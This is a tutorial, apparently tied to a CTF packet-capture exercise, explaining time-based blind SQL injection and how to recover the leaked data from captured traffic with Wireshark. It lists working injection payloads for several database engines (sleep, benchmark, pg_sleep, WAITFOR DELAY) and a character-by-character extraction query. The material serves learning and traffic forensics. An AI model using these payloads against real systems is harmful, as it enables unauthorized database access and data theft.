1. The principle of delayed injection
Delay injection, also known as time blind injection, is a method of SQL blind injection. Blind time injection can be used when the page does not have any response to SQL injection, or when there is no difference in the response.
Blind injection: In the case of SQL injection, after the SQL statement executes the query, the queried data is not echoed to the page, and some special methods need to be used to judge or try. This process is called blind injection.
There are generally three types of blinds:
1. Boolean blind note: judge whether the page returns true or false, whether it exists or not;
2. Time blind note: judge whether the page is delayed or not;
3. Error blind note: input a special sentence to make the page report an error, and return the error message to judge.
Delayed injection of commonly used functions:
- Let the program hang, in seconds
sleep(<seconds>)
- if statement
if(<condition>,<true_expr>,<false_expr>)
Syntax: When condition is true, return true_expr, otherwise return false_expr
- get string length
length()
Commonly used: ?id=1' and if((length(查询语句) =1), sleep(5), 3) -- a, to judge the length of the query result, if the response time exceeds 5s, it means that the judgment is correct, and if it is wrong, continue to increase the query length
- intercept string
substr(string,num start,num length)
- Characters are converted to ascii code values (used to judge character content, exhaustive 32~126)
ascii()
Common Payloads:
sleep(10)--
benchmark(1000000000,md5(1))--
pg_sleep(10)--
; WAITFOR DELAY ‘00:00:10’;--
?id=1 and if(1,sleep(5),3) -- a
?id=1' and if(1,sleep(5),3) -- a
?id=1" and if(1,sleep(5),3) -- a
2. Data packet analysis
① Open the data package and you can see an obvious POST request;
②Select the data packet, right-click to track the flow –> HTTP flow, you can see some keywords such as ascii, substr, sleep:
③ It can be seen that the ASCII characters of the text (such as ;/?@:&=+%$, and other punctuation marks used to separate URI components) are encoded, and it is judged that the encodeURIComponent() function is used, using the online toolbox To decode (https://www.sojson.com/encodeurl.html):
After decoding, it is found that the request statement still contains encoding, and the result is decoded again:
④ You can clearly see the delayed injection statement: id=1) and if((ascii(substr((select flag from flag),1,1))='40'),sleep(3),0) – , where '40' corresponds to the ASCII left parenthesis;
⑤At this time, the filter frame.time_delta>3&&http can be used to filter out the packets with a delay greater than 3, and perform subsequent analysis to extract all ASCII characters.
